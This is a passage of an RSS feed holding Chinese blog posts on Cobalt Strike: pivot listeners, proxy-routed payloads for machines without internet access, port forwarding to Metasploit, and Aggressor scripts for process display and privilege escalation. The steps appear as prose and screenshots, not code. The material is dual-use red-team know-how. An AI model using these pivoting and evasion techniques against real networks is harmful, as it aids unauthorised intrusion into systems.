Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">首先新建一个不存在的listener，我们的意图只是为了生成一个可以连接到跳板机的payload</span></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.6951871657754011" data-s="300,640" style="" data-type="png" data-w="374" src="https://wechat2rss.xlab.app/img-proxy/?k=0c9ed523&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50OibQ4icSWBiaVv5CAWRiaxvNzEYXB5dufmqwOt5iaXzhupJaSufTUhxZY0Q%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">设置端口转发到外网的msf，msf那边监听就好</span><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.18861209964412812" data-s="300,640" style="" data-type="png" data-w="562" src="https://wechat2rss.xlab.app/img-proxy/?k=d6eaa201&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50aZ7AAM5zGOqqvMhS2C7W3xzMv0Ma0zbCq3RiarGTu5pOUe1qMyKW6TA%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">实现cs直接把不通外部互联网的机器弹到外网msf上，跟msf生成各种payload再端口转发上线外网无二致</span><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.20539152759948653" data-s="300,640" style="" data-type="png" data-w="779" src="https://wechat2rss.xlab.app/img-proxy/?k=fff48841&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50ReLzz7jvfSiberRRLeN6aeMGaBNpRFaC07OibNRbU8NceyBxicfBWmq7g%2F640%3Fwx_fmt%3Dpng"/></p><h3 class="md-end-block md-heading" style="box-sizing: border-box;font-size: 1.5em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.43;cursor: text;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span class="md-plain" style="box-sizing: border-box;">pivots</span><br/></h3><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">这是一种比较特殊的场景，权限不是特别稳固（当然为了相对尽量稳固你可以有一个代理圈养观察环节，或者干脆自己造代理），不过隐蔽性会稍稍好一些。</span></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">首先网上瞎找一个代理</span></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.5538461538461539" data-s="300,640" style="" data-type="png" data-w="1235" src="https://wechat2rss.xlab.app/img-proxy/?k=85c9c8a6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50fyibLvQsLpLppzl1Hjt1nWYgyfmLQek1PgNJWySSTl7JdOoPHYmhdTA%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">验证代理可用之后，到Attacks - &gt; Packages - &gt; Windows Executable（S）这里新建一个payload，当然要把刚才的代理填上。需要注意的一点是，这里的socks代理依旧是只支持</span><strong><span style="box-sizing: border-box;font-size: 15px;color: rgb(0, 0, 0);">sock4a</span></strong><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">哟</span><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.38929440389294406" data-s="300,640" style="" data-type="png" data-w="822" src="https://wechat2rss.xlab.app/img-proxy/?k=e437f024&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50VeGBtPQeywwPJ1goBKszhQ23ywpXDvDkDxicichsnduEIppM9XP1ibcpQ%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">用一种相对蛇皮的方式实现简单的规避，举一反三的话某些白名单环境说不定可以用的上呢</span><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.33853354134165364" data-s="300,640" style="" data-type="png" data-w="641" src="https://wechat2rss.xlab.app/img-proxy/?k=b7e1536c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50ePpHzjOJqy64lGEJh5wcSMvs0pPVGInQUrorUibN7WKrkMd8D11zQQQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.37524177949709864" data-s="300,640" style="" data-type="png" data-w="517" src="https://wechat2rss.xlab.app/img-proxy/?k=03a404a9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50V0jW9BmBKCDFuIJqlwngvnxuX8rGVGT97icztL4IXU90kich9ypLdkCQ%2F640%3Fwx_fmt%3Dpng"/></p><h3 class="md-end-block md-heading" style="box-sizing: border-box;font-size: 1.5em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.43;cursor: text;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span class="md-plain" style="box-sizing: border-box;">内网的代理</span></h3><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">算是上面举一反三想法的简单延伸，假设bind跟reverse我们都不用，直接在跳板机搭建一个代理（甚至有时候跳板机有一个天然的代理），借此上线。</span></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">搭建一个Http代理</span></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.14225352112676057" data-s="300,640" style="" data-type="png" data-w="710" src="https://wechat2rss.xlab.app/img-proxy/?k=1b3a0afc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50icsRLx3rbpsdL3zFKs49HhGkBRpwicRGjMTCicxhPrwcG09w46iauqLYuQ%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">为无法连接外部互联网的机器生成自带穿透payload</span><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.38310893512851896" data-s="300,640" style="" data-type="png" data-w="817" src="https://wechat2rss.xlab.app/img-proxy/?k=aeaa16a7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50gRWtibyIGv8jEXrAOj7N8GJEDAsO2VuEwibJOaOBNibUxoicvibwWMYl2Aw%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">上线</span><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.16251482799525505" data-s="300,640" style="" data-type="png" data-w="843" src="https://wechat2rss.xlab.app/img-proxy/?k=db44bcec&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50vobUAfV2lXF4t2IVW2xpw1GiaXzicFcpN8VBoBSicCujWLEhlFibiaSYSUA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.8610169491525423" data-s="300,640" style="" data-type="png" data-w="590" src="https://wechat2rss.xlab.app/img-proxy/?k=0df4eb8c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50AND9KSmDiaQUltiaCnJod8mFUicollb6IbkKqGs0KJibShz03pFRTaibbeQ%2F640%3Fwx_fmt%3Dpng"/></p><h3 class="md-end-block md-heading" style="box-sizing: border-box;font-size: 1.5em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.43;cursor: text;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span class="md-plain" style="box-sizing: border-box;">写在最后</span></h3><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">看完这些你可能会觉得smb骚得不行，但是金无足赤，跳板机如果控不稳一旦GG一次，通过smb和reverse上线的机器在跳板机重新上线之后似乎是无法重连的（且reverse类型的listener需要删除旧的重新基于新会话创建）。不过bind_tcp还在等你，前提是你建立了一个足够坚固的bind_tcp类型的beacon。</span></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.3760504201680672" data-s="300,640" style="" data-type="png" data-w="476" src="https://wechat2rss.xlab.app/img-proxy/?k=396123ee&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal503EjIplahLOS6T1vV650UctzDZT7tfF0VIAMWZOscoRW9EyG52K3nkg%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p md-focus" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span class="" style="box-sizing: border-box;"><strong style="box-sizing: border-box;"><span class="md-plain" style="box-sizing: border-box;">文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。<br/></span></strong></span></p><p class="md-end-block md-p md-focus" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span class="" style="box-sizing: border-box;"><strong style="box-sizing: border-box;"><span class="md-plain" style="box-sizing: border-box;"></span></strong></span></p><hr style="border-style: solid;border-width: 1px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px 0px;transform: scale(1, 0.5);"/><p style="text-align: justify;text-indent: 0em;"><br/></p><blockquote style="margin: 1.2em 0px;border-left: 4px solid rgb(221, 221, 221);padding: 0px 1em;color: rgb(119, 119, 119);quotes: none;"><p style="margin: 0px 0px 1.2em !important;"><span style="color: rgb(0, 0, 0);"><strong>参考链接：</strong></span><br/><a href="https://www.cobaltstrike.com/help-pivot-listener" target="_blank">https://www.cobaltstrike.com/help-pivot-listener</a><br/><a href="https://www.cobaltstrike.com/help-tcp-beacon" target="_blank">https://www.cobaltstrike.com/help-tcp-beacon</a><br/><a href="https://www.cobaltstrike.com/help-pivot-listener" target="_blank">https://www.cobaltstrike.com/help-pivot-listener</a><br/><a href="https://www.cobaltstrike.com/help-staged-exe" target="_blank">https://www.cobaltstrike.com/help-staged-exe</a><br/><a href="https://www.cobaltstrike.com/help-smb-beacon" target="_blank">https://www.cobaltstrike.com/help-smb-beacon</a><br/><a href="https://www.cobaltstrike.com/help-staged-exe" target="_blank">https://www.cobaltstrike.com/help-staged-exe</a><br/><a href="https://www.cobaltstrike.com/help-http-beacon#proxy" target="_blank">https://www.cobaltstrike.com/help-http-beacon#proxy</a><br/><a href="https://www.cobaltstrike.com/help-socks-proxy-pivoting" target="_blank">https://www.cobaltstrike.com/help-socks-proxy-pivoting</a><br/><a href="https://www.cobaltstrike.com/help-listener-management" target="_blank">https://www.cobaltstrike.com/help-listener-management</a><br/><span style="color: rgb(0, 0, 0);">作者老哥好人一生平安</span></p></blockquote><p>* 封面图背景图片来自：cobaltstrike.com<br/></p><p><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.5625" style="" data-type="gif" data-w="640" src="https://wechat2rss.xlab.app/img-proxy/?k=47f6bee8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50cqW0gQPicMtZIwsRibntzS3r6LHUlbWJiaDFBr2wGH85XebH5oAf7ibuEw%2F640%3Fwx_fmt%3Dgif"/></p><p><br/></p>



<p><a href="2247484055">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=425ba7c9&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU1NDYxMTE5OA%3D%3D%26mid%3D2247484055%26idx%3D1%26sn%3D90641c586480817d5b5bb1eb92e73b5f%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 16 Jul 2019 14:56:00 +0800</pubDate>
    </item>
    <item>
      <title>使用Aggressor脚本雕饰Cobalt Strike</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU1NDYxMTE5OA==&amp;mid=2247483977&amp;idx=1&amp;sn=6e517a17a33a17c3e283030e26fdefbf</link>
      <description>对cobalt strike常见aggressor脚本的简单收集和介绍。</description>
      <content:encoded><![CDATA[<p>
原创 <span>低级安服员王小烦</span> <span>2019-02-01 17:20</span> <span style="display: inline-block;"></span>
</p>

<p>对cobalt strike常见aggressor脚本的简单收集和介绍。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=dae79ff5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1X85BtZeauIPdJC7VNnmr1Fc4UNtBI3hN8RZXokYhibZricGyZdW6pMfugE9qDCcaeghCHm9ZRQmRg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.4166666666666667" style="" data-type="gif" data-w="480" src="https://wechat2rss.xlab.app/img-proxy/?k=c76950d6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNU5VtKYF4uYzj3q65nibMABhecJ8KbQygblGK4gdyxxgic76BHZV3NMtSw%2F640%3Fwx_fmt%3Dgif"/></p><p><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 15px;"><br/></span></strong></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 15px;">首先你要知道这依旧是没有什么技术含量并且十分粗糙的一篇水文，这一切都是因为作者的水平过于有限。对不起，也十分感谢大家的等待。</span></strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/> <br/>众所周知，第三次忍界大战之后cobalt strike 3.0是作为无Armitage为基础的重写版本，在这之前其依附于Metasploit协同作战之时就有开源拓展脚本Cortana可以为Cobalt strike和Armitage所用。CS作者的Cortana脚本可以把MSF和Beef联动，可以配合Veil进行bypass，还能爆破口令、嗅探、配合powershell等等，可谓骚得不行。<br/>脱离MSF之后的Aggressor Script 成为了开源脚本引擎 Cortana 的接班人，个人总结得出的结论是</span><span style="font-size: 15px;color: rgb(66, 63, 63);text-decoration: underline;"><em>Aggressor脚本的定位是red team用于方便自己和实现一定程度的例如横向渗透这种渗透工作自动化进行</em></span><span style="font-size: 15px;color: rgb(66, 63, 63);">，另外Aggressor脚本仍然良好的支持用于满足自身需求的扩展和修改。下面我要介绍的就是CS 3.0版本之后的一点点相关知识和一些agressor脚本。<br/> </span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><span style="font-size: 18px;color: rgb(0, 0, 0);"><strong>一、后前置知识</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);"></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);">在Cobalt Strike（下文简称为CS） 客户端当中操作Aggressor 脚本有两种方式，第一种是在“Cobalt Strike”功能区下的“Script Manager”当中管理Aggressor脚本，有几个简单的载入、卸载、重新载入和帮助按钮，脚本导入之后每次打开CS都会自动载入或者执行脚本。<br/></span></p><p><br/><span style="font-size: 15px;color: rgb(66, 63, 63);"></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.8422939068100358" data-s="300,640" style="" data-type="png" data-w="837" src="https://wechat2rss.xlab.app/img-proxy/?k=b667b958&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUsgsqvXLE7RibgzzGRzAR5vwHxYIpHTOY5p1fzATOhQezia05ND5nWQQA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"> <br/>第二种方式是在CS的Script Console当中对脚本进行管理，相对于上面的manager个人认为console的定位更偏向于aggressor脚本的开发者或者调试者使用，再或者是一些脚本的高级设置也可以在Console当中线上修改，而上面介绍的manager则更偏向于用户对于现成脚本的直接使用。另外我在测试时发现了一个小问题不好断定是作者故意的设置还是无意的BUG，就是在Console里使用load命令导入的脚本不会在manager当中进行同步，并且最大的区别是关闭CS再次打开之后在Console里使用load导入的脚本会全部释放掉，不会像manager里的一样会自动导入和保存。<br/>我把console里面的命令尽力解释了一下直接注释在了图片里，对这些命令的理解仅限于翻译+用户角度去揣测，所以对这注释的解释必然不是最佳的版本，也期待着师傅们来实锤和更正我。<br/> </span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.6832358674463938" data-s="300,640" style="" data-type="png" data-w="1026" src="https://wechat2rss.xlab.app/img-proxy/?k=47f919de&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUEDV4md1Qhja11soJKzdym7gMdxYFsZdic9UzzejDTq1vvmul3Z6N6bg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span> <br/></p><p style="margin: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 18px;color: rgb(0, 0, 0);"><strong><br/></strong></span></p><p style="margin: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 18px;color: rgb(0, 0, 0);"><strong>二、一些脚本和对它们的简单介绍</strong></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"> <br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>1、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">先介绍一个展示进程并给程序上色的脚本，作者实际上是修改自harleyQu1nn （后面会介绍）的ProcessColor.cna，但是个人认为这一手进程树展示修改可谓画龙点睛。<br/>脚本名称：<strong>ProcessTree.cna</strong><br/>脚本功能：ps命令展示进程树并上色<br/>脚本位置：命令行中<br/>地址： <a href="https://github.com/ars3n11/Aggressor-Scripts" target="_blank">https://github.com/ars3n11/Aggressor-Scripts</a><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.8185907046476761" data-s="300,640" style="" data-type="png" data-w="667" src="https://wechat2rss.xlab.app/img-proxy/?k=3b74e467&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNU8ibCf0GmPfeDL3mh29KStKGib83GJiaMwrQzicOJ9AzzB0mEiaTp5CIIx0A%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>另外可以针对国情以及其他因素自行在进程列表当中增加需求进程，例如火绒、360国际版等，而且还可以添加点不那么常见但是大家都喜欢的东西，比如VPN、笔记、网盘等的进程。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.3704663212435233" data-s="300,640" style="" data-type="png" data-w="772" src="https://wechat2rss.xlab.app/img-proxy/?k=52c209d9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUAFsrfgUK7zJ0GIpwy9TaCV8LR9gocGYssuHTrrYPGfU4M15rqEickuA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>下面这张图应该就很明了了，与单纯的进程上色相比，增加了defender等几个进程，最重要的是巧妙的展示出了父子进程的关系，我觉得海星。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.9641148325358851" data-s="300,640" style="" data-type="png" data-w="836" src="https://wechat2rss.xlab.app/img-proxy/?k=6c4b10e7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUNibRRdhXNJlvuJoV2Vib8ELXvNERPzO9rxR3ZqHnhFenJwsmHH6XeicgA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"> </span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>2、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">第二个介绍出镜率比较高的elevate脚本，CS作者rsmudge大佬官方出品，增加五种提权方式。有时候一把梭能用得上，本来存了张利用成功打算放在这里的图来着，死活找不到了。后面还有几个该脚本的升级版，大体是在此基础上做的增加或者修改。<br/>脚本名称：<strong>elevate.cna </strong><br/>脚本功能：增加五种提权方式<br/>脚本位置：在elevate中<br/>地址： <a href="https://github.com/rsmudge/ElevateKit" target="_blank">https://github.com/rsmudge/ElevateKit</a><br/> <br/></span></p><p><img class="" data-copyright="0" data-ratio="0.7342799188640974" data-s="300,640" style="" data-type="png" data-w="493" src="https://wechat2rss.xlab.app/img-proxy/?k=99873cb1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUbia55YTI0cPtssXzbyX2J896be16G6t1j5iaht78rWqd0ybphY4s8p4g%2F640%3Fwx_fmt%3Dpng"/><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/> <br/></span><span style="color: rgb(66, 63, 63);font-size: 